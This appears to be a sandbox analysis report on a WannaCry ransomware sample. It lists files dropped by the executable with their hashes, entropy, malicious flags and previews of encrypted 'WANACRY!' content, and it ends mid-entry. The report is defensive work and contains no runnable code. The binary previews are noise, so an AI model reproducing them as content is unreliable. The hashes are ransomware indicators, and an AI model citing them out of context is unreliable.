                                                                                      Entropy (8bit):7.999963979136128
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:V6ttRZH+ogsvSnlcoWwEnpXu1KP5h7J7vyG/GjbNU+nCEzR0r6LHJTw:CjZssklCpX4KhhFbjGvNfCEztLpTw
                                                                                      MD5:A64E73712EE044FF36A6F57842E133E0
                                                                                      SHA1:1053535CF335BB4426B05BCA7E935E0F900E304A
                                                                                      SHA-256:9FE826403764711215EA2820A5B5371F16CB4EAD54096EADD5E61569C7D10BDF
                                                                                      SHA-512:C136B030E6EAF3A198A18FBB5BA3856BAAFCF5D70C7DC15A1BE3B63640B9B27570393B8B90CB0370B987D0FE7A5E99D8F2640D20577D7839F691CC8C77BFDE02
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......'@B..8.w2......lV..s..d..C.C.9q.......Kef..wh....:...._>.._+.. ....?..k..(>t.C.V.........%FqG.s....@...zD.W/...g..:b3..\.G.-... .,.....1g.?^.L..+.%......JQ..!.P._.<..cE..j!...0......^..l&.......P|..)...e.!...ET....E..!o..J...X.U..=.DU.m2.....CV......r.h.t..=.=z..;l1..d...:..oC.c....D..]6....=.....0.L<.....ei..W..~@.R=.....}.M.....W..n.@:.`.%......Tx'.0.n[...c+.*......J..f..).(h3.'}[..~......,ul).....p.6..".. UT$..iXw.^..[."....uVz...D.v......O.1..#.I..+..x.J...k..L........Gt.....!..xx.X..i:.7H....u..P=...o....|...<.j..p.&.o.Y.t.F.)C.3...+..4...w.s....`o.....F$..3.....z(X..B.5r).....x......c.7....I...K.O4...J'.w..0M;UbC.l..F=3.y2X...28.......rL...((i..........#.Xu...F...^..qu....fW...Xtq...[.C.-d..O..lR.?...b....o..d'.n..Y..=.2H..sg..K...b'.I.hj.k..."N.t..gy..3.{...h4.....23....k..e.....+..z5.hpF.....""t/.W{)....--.q.X.=.$....._.c.D..=...M-C.@J......E.0.....'J%%N*..u..a."vX.&.yds...........b6...g..6$.N..).-...|.>..b;Kd.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12216
                                                                                      Entropy (8bit):7.9833734734724064
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CEB3V0NAZM8n3FNVkVrTANQNwq5y5Dk7FPj/z9FrOJZUMsjdWoEHjpZzCzTKStIc:CEltZdn3FNeSNQq9sJz9FyJGPw5bC3KY
                                                                                      MD5:DF9C9651B4C2F0437198EE6B7BE6BBA0
                                                                                      SHA1:CB1EA374276CB758EC15945342B6F05AEA1A980F
                                                                                      SHA-256:6CE0784B44F9C56A63B0546EF215BDB7C121862FD1BFE055881568EC6CE2B630
                                                                                      SHA-512:F9BD1F9E24EB92801A62E016FBEC833EE23164AB237F50DE7FB24679926CCDD7AB44E55ED57B2C8F5A2F087F917E71990A06367CD2ACEE66E249608856887D67
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......EFH....''/..Z.O.v..-T#=.H1W:..)...;zQ...y.>.#Ih......,..P...i...*h..^k...@..l.lV..#.~[...Q$ ...Pl..M.t..0..vI..u7.3.....p..'.l...~.&=....p[!.8.5hT.H.A.....99}r...'......Z_1.y.$E....wR....w...%.8.g....6...+u.....2.s...s.tL.F..T.N."n.h,.i.5..r=.\.u..................7. ....KO..E..Zm@>.}.......Ao..K....O.Ka...`.O..x....C...\..u.0.d.jb.M.v!.%.dwU.*.=.2f.^.s..%...S...j..J..H.B.8..i.7D`K..L...S.w.|..Z........8.6...NR.@.dpQ.#r2@.Q1f.....(T....<..+.C..C.._....@7...@+.}.L....#Y....T.OV....Dh<.5..l.Y....#.#..$0.I.....36`E5~.=.Q..:IA.....<D..6.Y.Ekdj....]V..!............Z.:!.T..D..fy/.V.g.......5....q(..e.V+;..]]....F.y].*.?..f..O...JB/T.%ZT....9...F...N=Fo..M}h..#.4-.o.o.".D..(U.Ek...'...n.l....#.)x....P~Y.4....@]......m...'..&fD_.R.....O......6.U.+..@.B6.W/q|.o..}.F2a<.ip.......1.F._Ha8.&g.."._X.v.,,.W..w..0.n.%C..=...s.iN:......G....M....T..6.$..8.3..{.vsX.q...5%..p}".D....E...n(I.Q)|%......5...ZI..u9g2.C.3;...P>[.ix.h.........:.......+..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12216
                                                                                      Entropy (8bit):7.9833734734724064
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CEB3V0NAZM8n3FNVkVrTANQNwq5y5Dk7FPj/z9FrOJZUMsjdWoEHjpZzCzTKStIc:CEltZdn3FNeSNQq9sJz9FyJGPw5bC3KY
                                                                                      MD5:DF9C9651B4C2F0437198EE6B7BE6BBA0
                                                                                      SHA1:CB1EA374276CB758EC15945342B6F05AEA1A980F
                                                                                      SHA-256:6CE0784B44F9C56A63B0546EF215BDB7C121862FD1BFE055881568EC6CE2B630
                                                                                      SHA-512:F9BD1F9E24EB92801A62E016FBEC833EE23164AB237F50DE7FB24679926CCDD7AB44E55ED57B2C8F5A2F087F917E71990A06367CD2ACEE66E249608856887D67
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......EFH....''/..Z.O.v..-T#=.H1W:..)...;zQ...y.>.#Ih......,..P...i...*h..^k...@..l.lV..#.~[...Q$ ...Pl..M.t..0..vI..u7.3.....p..'.l...~.&=....p[!.8.5hT.H.A.....99}r...'......Z_1.y.$E....wR....w...%.8.g....6...+u.....2.s...s.tL.F..T.N."n.h,.i.5..r=.\.u..................7. ....KO..E..Zm@>.}.......Ao..K....O.Ka...`.O..x....C...\..u.0.d.jb.M.v!.%.dwU.*.=.2f.^.s..%...S...j..J..H.B.8..i.7D`K..L...S.w.|..Z........8.6...NR.@.dpQ.#r2@.Q1f.....(T....<..+.C..C.._....@7...@+.}.L....#Y....T.OV....Dh<.5..l.Y....#.#..$0.I.....36`E5~.=.Q..:IA.....<D..6.Y.Ekdj....]V..!............Z.:!.T..D..fy/.V.g.......5....q(..e.V+;..]]....F.y].*.?..f..O...JB/T.%ZT....9...F...N=Fo..M}h..#.4-.o.o.".D..(U.Ek...'...n.l....#.)x....P~Y.4....@]......m...'..&fD_.R.....O......6.U.+..@.B6.W/q|.o..}.F2a<.ip.......1.F._Ha8.&g.."._X.v.,,.W..w..0.n.%C..=...s.iN:......G....M....T..6.$..8.3..{.vsX.q...5%..p}".D....E...n(I.Q)|%......5...ZI..u9g2.C.3;...P>[.ix.h.........:.......+..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):358056
                                                                                      Entropy (8bit):7.999507650309511
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:dVXB1vRNFPYbcLxR/sDdsGZtER3kUj9Ib6MF1fe9Nr0rU8k8TA3NdtR7F3+HC:dVXB3PYEunElkUj0+8vk8TSZR7x+i
                                                                                      MD5:C1036EA7CF704D4161FF9EFFE4D93E44
                                                                                      SHA1:697BA49158F3999DEABDA08F06A2457CAEA35C9A
                                                                                      SHA-256:123210C328F8C01963C8E47CD38A24118E9A96EB8AC2CB74BBF5E3F0C36CDCCF
                                                                                      SHA-512:00CBF4D2303C7A6301A7050ABC51569E6AF1AF7932CF5BC61E3B901F360EA41921CF86DB5B5EABAE1F1C7DDB38C049A75140176B1D6A659C416D2408E8EB7ABE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......f....^...F.`...W..8...~..p<.....%..:!.../..))..=x......l2..V...)..a...Yk.A.0.Z.6...-.....A..'2.J.....h...jC...F.w}1f+./.k.t/;.~....%..Wi....]...KG.....{..s.Au|g..._...$.4....0.9VZ...H,.s..YL.>^..u.85E..c.........p....%...lz.._R./...._|..K.{.....u........3....?......>.(.P.JbasLDic.4....a...On.]Yy......n......y.K[..gd....b. f.`..i..;...v@..T.}..1c..6..X.... .z...&Qh..Spp.8.<j`:..F...d.u0..!..iN.....a.<..!^V.A.$..C....h......+..H".."...|..!u.|.G...4......$.....h...@.f...\x.5C...#+........m..X.?6.....8Ln.v.W....f..8.2........a....|..z.23.>@......y....B.f+....U2....,..Vh....PM.D._+..7.M...(.E...........]|..U..a..a%..../Y....H..{..o....GH.,W.".....W....lV.:.7.....UHa+............l..J..Y..5...n..".>s....r.!.;..]..A.`)...z.(O-NYh.....>Du....x..d,h.v...S.......m,...........v.....r..:.F.L.)....L.r...z...P.G.;."....U......Z.S.wV.Fr|=....F9../....n....B...._...S2..m...2....%.A...f..PS..+..9`...I..t%b..8...~.f...Z........i....UK..\G6V.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):358056
                                                                                      Entropy (8bit):7.999507650309511
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:dVXB1vRNFPYbcLxR/sDdsGZtER3kUj9Ib6MF1fe9Nr0rU8k8TA3NdtR7F3+HC:dVXB3PYEunElkUj0+8vk8TSZR7x+i
                                                                                      MD5:C1036EA7CF704D4161FF9EFFE4D93E44
                                                                                      SHA1:697BA49158F3999DEABDA08F06A2457CAEA35C9A
                                                                                      SHA-256:123210C328F8C01963C8E47CD38A24118E9A96EB8AC2CB74BBF5E3F0C36CDCCF
                                                                                      SHA-512:00CBF4D2303C7A6301A7050ABC51569E6AF1AF7932CF5BC61E3B901F360EA41921CF86DB5B5EABAE1F1C7DDB38C049A75140176B1D6A659C416D2408E8EB7ABE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......f....^...F.`...W..8...~..p<.....%..:!.../..))..=x......l2..V...)..a...Yk.A.0.Z.6...-.....A..'2.J.....h...jC...F.w}1f+./.k.t/;.~....%..Wi....]...KG.....{..s.Au|g..._...$.4....0.9VZ...H,.s..YL.>^..u.85E..c.........p....%...lz.._R./...._|..K.{.....u........3....?......>.(.P.JbasLDic.4....a...On.]Yy......n......y.K[..gd....b. f.`..i..;...v@..T.}..1c..6..X.... .z...&Qh..Spp.8.<j`:..F...d.u0..!..iN.....a.<..!^V.A.$..C....h......+..H".."...|..!u.|.G...4......$.....h...@.f...\x.5C...#+........m..X.?6.....8Ln.v.W....f..8.2........a....|..z.23.>@......y....B.f+....U2....,..Vh....PM.D._+..7.M...(.E...........]|..U..a..a%..../Y....H..{..o....GH.,W.".....W....lV.:.7.....UHa+............l..J..Y..5...n..".>s....r.!.;..]..A.`)...z.(O-NYh.....>Du....x..d,h.v...S.......m,...........v.....r..:.F.L.)....L.r...z...P.G.;."....U......Z.S.wV.Fr|=....F9../....n....B...._...S2..m...2....%.A...f..PS..+..9`...I..t%b..8...~.f...Z........i....UK..\G6V.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4552
                                                                                      Entropy (8bit):7.963661097387522
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oAAzSX7djCwWwN8xJ7C5owmKwtkOUGtYi6X8k1FxuRdTSis0jgvL5gh:kSLdjCwq+9YU0ynY7rs08vL5gh
                                                                                      MD5:C28AC87E14FA8572947F68A45245DBE3
                                                                                      SHA1:063C8080FB80C80238F6391E2915386C5B9BFC5D
                                                                                      SHA-256:B855C1EB34AA253FA9C19B329ED2FFF151ED620E01C27D2A24471482445AC6B7
                                                                                      SHA-512:33226EE6FD69D4B768452DFE4D72270D46AD86203686DE5942EA40120356639448A0049466BDF2784EB48C7F6EBFF3310CBF632FFAF9DACBD06D7D76BB4F1479
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....G,e......e...D.S}?.8..F....=V.RI&p,"}...-3..q.,(.n0h..|Op..s&eI.;..C.c.CA.C...\.c.'..n...q.aX.|.P.S.VV......l....}i.Z.L.....3..^..5)H...HL..C....\.q.#.#......c.. .[.$, .>...H...=v.Y1..E...%._..VG..[1..H&*.0.=L...O......5n<|....:.........d..............TBw........uM..s.F...A_.zm..`h.c.......c..'(V..k.;.......p..:.j,p...j! .......'..X._.*|...../.U.D.....x..8i..w.]....e...jT..........g...R&p.jx. .Q..".<C....+mI.....4.C........*............K..x.K^F..{.{......q)...@s...am.7..P.......iM..e'Ch<..... ..2.B..LA.hhV..EJ...bU.[.p.m...l...`.6U..] E.^y.f.y.....Oc..'....v.S...._\.v/.s.vE..V.B#.0l\.Gk.."......@....(....&.>.S@.S.#XQx..+"...}....S....\*.u..-.........W..X4...A..p.o-.$..e@J...j.x+..A..}.*.....[#...=.....+2..k*.....^.....@..B.7..R...K......b.....t..'.....d.c..G..ft.>.i.vAS,..L..=......bw.hb.I...&.j...b<.X.8..8...OK.J.+M..N..V.M.fkA..../...."..c...K....k.D@..H9..u_.....t....Y6;..6Z..3k..tVz......!...m~ ..3L......N....f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4552
                                                                                      Entropy (8bit):7.963661097387522
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oAAzSX7djCwWwN8xJ7C5owmKwtkOUGtYi6X8k1FxuRdTSis0jgvL5gh:kSLdjCwq+9YU0ynY7rs08vL5gh
                                                                                      MD5:C28AC87E14FA8572947F68A45245DBE3
                                                                                      SHA1:063C8080FB80C80238F6391E2915386C5B9BFC5D
                                                                                      SHA-256:B855C1EB34AA253FA9C19B329ED2FFF151ED620E01C27D2A24471482445AC6B7
                                                                                      SHA-512:33226EE6FD69D4B768452DFE4D72270D46AD86203686DE5942EA40120356639448A0049466BDF2784EB48C7F6EBFF3310CBF632FFAF9DACBD06D7D76BB4F1479
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....G,e......e...D.S}?.8..F....=V.RI&p,"}...-3..q.,(.n0h..|Op..s&eI.;..C.c.CA.C...\.c.'..n...q.aX.|.P.S.VV......l....}i.Z.L.....3..^..5)H...HL..C....\.q.#.#......c.. .[.$, .>...H...=v.Y1..E...%._..VG..[1..H&*.0.=L...O......5n<|....:.........d..............TBw........uM..s.F...A_.zm..`h.c.......c..'(V..k.;.......p..:.j,p...j! .......'..X._.*|...../.U.D.....x..8i..w.]....e...jT..........g...R&p.jx. .Q..".<C....+mI.....4.C........*............K..x.K^F..{.{......q)...@s...am.7..P.......iM..e'Ch<..... ..2.B..LA.hhV..EJ...bU.[.p.m...l...`.6U..] E.^y.f.y.....Oc..'....v.S...._\.v/.s.vE..V.B#.0l\.Gk.."......@....(....&.>.S@.S.#XQx..+"...}....S....\*.u..-.........W..X4...A..p.o-.$..e@J...j.x+..A..}.*.....[#...=.....+2..k*.....^.....@..B.7..R...K......b.....t..'.....d.c..G..ft.>.i.vAS,..L..=......bw.hb.I...&.j...b<.X.8..8...OK.J.+M..N..V.M.fkA..../...."..c...K....k.D@..H9..u_.....t....Y6;..6Z..3k..tVz......!...m~ ..3L......N....f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1144
                                                                                      Entropy (8bit):7.835720238655417
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkge+nshtMJ57NlNNgFZKGc6rtFb4l9rpuP43Av3:bkg1shtWe/mstFb4bpO4A3
                                                                                      MD5:F93CA10152DCE126FE16A11A3CB9B52A
                                                                                      SHA1:199F26EBE8321D7723CF4279552E427F4FF8F6A9
                                                                                      SHA-256:47085F1262CAC3D3066D4067400D273F8F7E039F4A1F9CF00BE9F47857AFEB27
                                                                                      SHA-512:BB6D8B38C3B0FF515F999FCD12C4D193289B1FCDCE9ECF867F4B9DA9EE9F49B29BD1589EAA1CF14E430A154EFA5525E5C28810C1FA0AF2A9B65618027EEC895E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......,o.........!B}_(x.V...2.J.$..+@.P.l..E@..kM:V.p>.x..il...$.~M.0..Rd.Q...CQqS...=2.hG...t....i.Q.m..P.C.....t.....<...7.c.8d....X.m...u.V.6h....!<........7.L.[........y.!......q.2....#.W.........&=.}.%.a.:..?....P.&...F9.-z..,.X..z4.?.?,.E$...._........(.?F.k..c....2:...g..m.L.N@.....R.T3.......A...e.........O@bR....su..i...~......9...?^.....V%...5#C....h~D!.K.mSo..D......*..$.."8.....9..+b....S.k> ..N........AH..B.=4....y..5...<@...\&......M.N=..86........~C"....+"..I........_$.2.D.X..!.......S.F..^.-=U.o..*".g..t........?Q..4).[W5..c.D........gh.j....\.Oh.6..XP..rH..{-S~).N....2dz....h...M......l....3u"...H...s..1G.5.v...y.O.].D...e^..B..\D.B...~@m.<Dy7.E..l}.@B.O...P....4K...M.....vw.@/.S..I.fZ....%8A...[A..#W.8..X...M.....S..._...6#-h..)....+./..gJ[.X...=.........ohr.<./..|..i.k}. ..YO.H......^.rh.o\t0d.U..z...$~.:..Y.C..l.+..;...|w.n.0..I.[7P.%.`.d....uHO..6t..8.."._.$....Z....`'...A...E..7......Ofc.PA<>...3OM...(.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1144
                                                                                      Entropy (8bit):7.835720238655417
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkge+nshtMJ57NlNNgFZKGc6rtFb4l9rpuP43Av3:bkg1shtWe/mstFb4bpO4A3
                                                                                      MD5:F93CA10152DCE126FE16A11A3CB9B52A
                                                                                      SHA1:199F26EBE8321D7723CF4279552E427F4FF8F6A9
                                                                                      SHA-256:47085F1262CAC3D3066D4067400D273F8F7E039F4A1F9CF00BE9F47857AFEB27
                                                                                      SHA-512:BB6D8B38C3B0FF515F999FCD12C4D193289B1FCDCE9ECF867F4B9DA9EE9F49B29BD1589EAA1CF14E430A154EFA5525E5C28810C1FA0AF2A9B65618027EEC895E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......,o.........!B}_(x.V...2.J.$..+@.P.l..E@..kM:V.p>.x..il...$.~M.0..Rd.Q...CQqS...=2.hG...t....i.Q.m..P.C.....t.....<...7.c.8d....X.m...u.V.6h....!<........7.L.[........y.!......q.2....#.W.........&=.}.%.a.:..?....P.&...F9.-z..,.X..z4.?.?,.E$...._........(.?F.k..c....2:...g..m.L.N@.....R.T3.......A...e.........O@bR....su..i...~......9...?^.....V%...5#C....h~D!.K.mSo..D......*..$.."8.....9..+b....S.k> ..N........AH..B.=4....y..5...<@...\&......M.N=..86........~C"....+"..I........_$.2.D.X..!.......S.F..^.-=U.o..*".g..t........?Q..4).[W5..c.D........gh.j....\.Oh.6..XP..rH..{-S~).N....2dz....h...M......l....3u"...H...s..1G.5.v...y.O.].D...e^..B..\D.B...~@m.<Dy7.E..l}.@B.O...P....4K...M.....vw.@/.S..I.fZ....%8A...[A..#W.8..X...M.....S..._...6#-h..)....+./..gJ[.X...=.........ohr.<./..|..i.k}. ..YO.H......^.rh.o\t0d.U..z...$~.:..Y.C..l.+..;...|w.n.0..I.[7P.%.`.d....uHO..6t..8.."._.$....Z....`'...A...E..7......Ofc.PA<>...3OM...(.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5608
                                                                                      Entropy (8bit):7.967565456659338
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o1gdLwUG/q2ggqy8W1u86dSKnBRhV7lPVD+DVVStd4WcbD8D7NeZSE4NlNc3S5GQ:BBb2gby8W1u5nZV7SBEd4WFXwZSE4NM8
                                                                                      MD5:09DEF18002C9A3B26179525CBFB13CA8
                                                                                      SHA1:DE683619E049FD60F089471E2B3DEE9709A85F7B
                                                                                      SHA-256:FCC91C2490D884327D11DEAEC2B0E2A818623731C62CED098E65366F7289F135
                                                                                      SHA-512:074E4F9BB5F422695929362628AEB32B3754C6FD3BB0E9B776FC92933829AEB171AF97FCD4664692FEECB5A272F90668E1A4B63CF8AD43F9F72FF9FF857C1451
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........s.._..N.eU.>.....n.1....H4:..[...a./.....!....,.z......kD...b.."r...x..i...)r....L..KP..)M.9z.........V..NN....../.O..Z.[I@$Q.D.V.k{..9\....r..n..)/m2.*3....E.G..I......F...wvb..DXL.L~S(......\Q....s[.....}.D..(.%g.......,{...|.3.."...............~...~......7p}.}\....nm.H....3.P.Q..WM.c."....XY..........{..zF...........1@.w....!.v7....F..ax@0@.6.....?0......ysj./.F.:..;;.q.s...>$C.V.Q..., r....MJ.Hl.~ ....mf..bZ.j].,v,X.Y.....G..&^(....jb...p....i....W..g..B...V....!Z..=...ZO......`...)P....,~....7.*...S.S.p...]e.U...@4v..81...i1...DP.o).j$!....U...z...U.........:A.+G...9W.~....1.u>h.hy@..r.Mb7..o.9C........+..4..|.&..6.~.....h8...8w...(.......1![_.|.E7;@j...G.._.p.!.P...y;...u..",:..3. 'd4q....5.>...x..V..F...9.y.).^......'/'..+.Y..>.|..-...%..<.)L%..vF.)...wQ.`..E.Y.g.;..)r..=Ii...Ga..I..^P...64..9.$.P.H......]C`.R......6....$.zK...'.*.W.C......? ....!..j...Tc=i..........m1.P.z...1.v....g.....ed .t.8.t...7|.K..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5608
                                                                                      Entropy (8bit):7.967565456659338
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:o1gdLwUG/q2ggqy8W1u86dSKnBRhV7lPVD+DVVStd4WcbD8D7NeZSE4NlNc3S5GQ:BBb2gby8W1u5nZV7SBEd4WFXwZSE4NM8
                                                                                      MD5:09DEF18002C9A3B26179525CBFB13CA8
                                                                                      SHA1:DE683619E049FD60F089471E2B3DEE9709A85F7B
                                                                                      SHA-256:FCC91C2490D884327D11DEAEC2B0E2A818623731C62CED098E65366F7289F135
                                                                                      SHA-512:074E4F9BB5F422695929362628AEB32B3754C6FD3BB0E9B776FC92933829AEB171AF97FCD4664692FEECB5A272F90668E1A4B63CF8AD43F9F72FF9FF857C1451
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........s.._..N.eU.>.....n.1....H4:..[...a./.....!....,.z......kD...b.."r...x..i...)r....L..KP..)M.9z.........V..NN....../.O..Z.[I@$Q.D.V.k{..9\....r..n..)/m2.*3....E.G..I......F...wvb..DXL.L~S(......\Q....s[.....}.D..(.%g.......,{...|.3.."...............~...~......7p}.}\....nm.H....3.P.Q..WM.c."....XY..........{..zF...........1@.w....!.v7....F..ax@0@.6.....?0......ysj./.F.:..;;.q.s...>$C.V.Q..., r....MJ.Hl.~ ....mf..bZ.j].,v,X.Y.....G..&^(....jb...p....i....W..g..B...V....!Z..=...ZO......`...)P....,~....7.*...S.S.p...]e.U...@4v..81...i1...DP.o).j$!....U...z...U.........:A.+G...9W.~....1.u>h.hy@..r.Mb7..o.9C........+..4..|.&..6.~.....h8...8w...(.......1![_.|.E7;@j...G.._.p.!.P...y;...u..",:..3. 'd4q....5.>...x..V..F...9.y.).^......'/'..+.Y..>.|..-...%..<.)L%..vF.)...wQ.`..E.Y.g.;..)r..=Ii...Ga..I..^P...64..9.$.P.H......]C`.R......6....$.zK...'.*.W.C......? ....!..j...Tc=i..........m1.P.z...1.v....g.....ed .t.8.t...7|.K..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.932239161880729
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk5T9AlKfeaSGyhETBcPVp/GAVoFyw0ozlq+ZRwla96rGcNKAidD:o5JAcshGChGAyFywZlqFA96rG/ld
                                                                                      MD5:7F037EE8155B9B2B696012C745A6C488
                                                                                      SHA1:C8D77CBDB9031EC9815B73D4D7AFA3E693D3CB4D
                                                                                      SHA-256:A3705DED28DF8CDF8C08103222D12B0A1E83D1AD6FA09C54A86FCD2BA3979954
                                                                                      SHA-512:3B7D1C1B18FC9BD073826E1B15DCC5987558EA8D0D6C1EC8B653EAB33B7D8A7F4E111697814B020992019BA757A07B9EBAAA522015D3F2EF2928A8192D7F575F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....;^..V..P..e..[p.#b......9....Qq..Hx6H.)c..{.....qSt..2.z....yS.a..H....}.e.`.)..p..l.RH...c[F.^;=..p@...........+r...M&......MT.e$fx...?O...#8G..%...0..T..e...ab.-yy......v..+...t.3.a.&..zt....2...V.|.C?.$.....N...".>j..P......... ..t....g.......(....B.p0..6...o.D.8.OA...U.k..xg.0....x!/oFb...Y.$..&Y......pz..g.M.2S.y.....M..;GlK.DBEMA:..t%..#..k...y,O....e..s6...c..h.....Db......Q.If...mj..'.r.Z..BQ`..e.U.:`...T`...B..J.A$.yFCq.!...LA .j.[........}.#.r.k.R..5....y..oBf;..`.l.=..L...J.Q=.!.y...89'....`..7...>.R...E.l....!.2.....c1.......-.-.k...m.q4.1..#..+.....E..N,!...(pA..#......6.v.}!.q.9..t}P....)..r..E.g.d.'f.B.i..P.C\....G......V.|f...c.,o3[..._.....'...?...]...;...T...dBSl.W......p.h;.....6..~........8Cf...I.ZK..`b ..&..6:?.6....tbx...Z.........T./{..|...*...b.aNo.B.9<.B..:......!..5..izVO..3..R;5..6J(J..~....V[.A.S......a.B...T..>.S.H...U..f...1.9.z'.m..=..jH.{|.Kz.llU.XM...$.....O....6..).+H./.,............Z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.932239161880729
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk5T9AlKfeaSGyhETBcPVp/GAVoFyw0ozlq+ZRwla96rGcNKAidD:o5JAcshGChGAyFywZlqFA96rG/ld
                                                                                      MD5:7F037EE8155B9B2B696012C745A6C488
                                                                                      SHA1:C8D77CBDB9031EC9815B73D4D7AFA3E693D3CB4D
                                                                                      SHA-256:A3705DED28DF8CDF8C08103222D12B0A1E83D1AD6FA09C54A86FCD2BA3979954
                                                                                      SHA-512:3B7D1C1B18FC9BD073826E1B15DCC5987558EA8D0D6C1EC8B653EAB33B7D8A7F4E111697814B020992019BA757A07B9EBAAA522015D3F2EF2928A8192D7F575F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....;^..V..P..e..[p.#b......9....Qq..Hx6H.)c..{.....qSt..2.z....yS.a..H....}.e.`.)..p..l.RH...c[F.^;=..p@...........+r...M&......MT.e$fx...?O...#8G..%...0..T..e...ab.-yy......v..+...t.3.a.&..zt....2...V.|.C?.$.....N...".>j..P......... ..t....g.......(....B.p0..6...o.D.8.OA...U.k..xg.0....x!/oFb...Y.$..&Y......pz..g.M.2S.y.....M..;GlK.DBEMA:..t%..#..k...y,O....e..s6...c..h.....Db......Q.If...mj..'.r.Z..BQ`..e.U.:`...T`...B..J.A$.yFCq.!...LA .j.[........}.#.r.k.R..5....y..oBf;..`.l.=..L...J.Q=.!.y...89'....`..7...>.R...E.l....!.2.....c1.......-.-.k...m.q4.1..#..+.....E..N,!...(pA..#......6.v.}!.q.9..t}P....)..r..E.g.d.'f.B.i..P.C\....G......V.|f...c.,o3[..._.....'...?...]...;...T...dBSl.W......p.h;.....6..~........8Cf...I.ZK..`b ..&..6:?.6....tbx...Z.........T./{..|...*...b.aNo.B.9<.B..:......!..5..izVO..3..R;5..6J(J..~....V[.A.S......a.B...T..>.S.H...U..f...1.9.z'.m..=..jH.{|.Kz.llU.XM...$.....O....6..).+H./.,............Z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6136
                                                                                      Entropy (8bit):7.97104411620675
